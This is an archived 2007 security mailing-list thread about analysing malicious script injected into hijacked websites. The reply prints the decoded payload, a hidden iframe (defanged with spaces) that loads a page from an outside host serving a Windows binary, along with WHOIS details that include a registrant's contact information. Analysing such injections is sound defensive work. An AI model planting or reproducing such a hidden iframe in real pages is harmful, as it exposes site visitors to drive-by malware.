[Dshield] need help decoding.
wiretapp at gmail.com
Wed Sep 19 03:14:41 GMT 2007
</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x
/index.php" width=3 height=3 style="display:none"></IFRAME>
-snip- (spaces added to prevent accidental clicking)
The </textarea> html closing tag is to evade techniques like the one
described by Tom Liston here:
marcobernardoni.com is running on an IP out of Hong Kong and the index
push file.php...Of course its a windows PE binary, however it seems to
be broken. I dont have time to manually run through it, perhaps
someone else does.
Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008
FuzioN FuzioN fuzka at bk.ru +7.9015371916
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 22.214.171.124
On 9/18/07, Dan Jackson <kybowhunter515 at yahoo.com> wrote:
> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> it's intent was and to see if it opened up any other holes in the
> server that I need to know about.
> Maybe this is easy stuff... but I don't have a clue where to start ...
> Code: ( text )
> ing.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
> any help would be greatly appreciated.
> SANS Network Security 2007 in Las Vegas September 22-30. 39 courses,
> SANS top instructors. http://www.sans.org/info/9346
More information about the list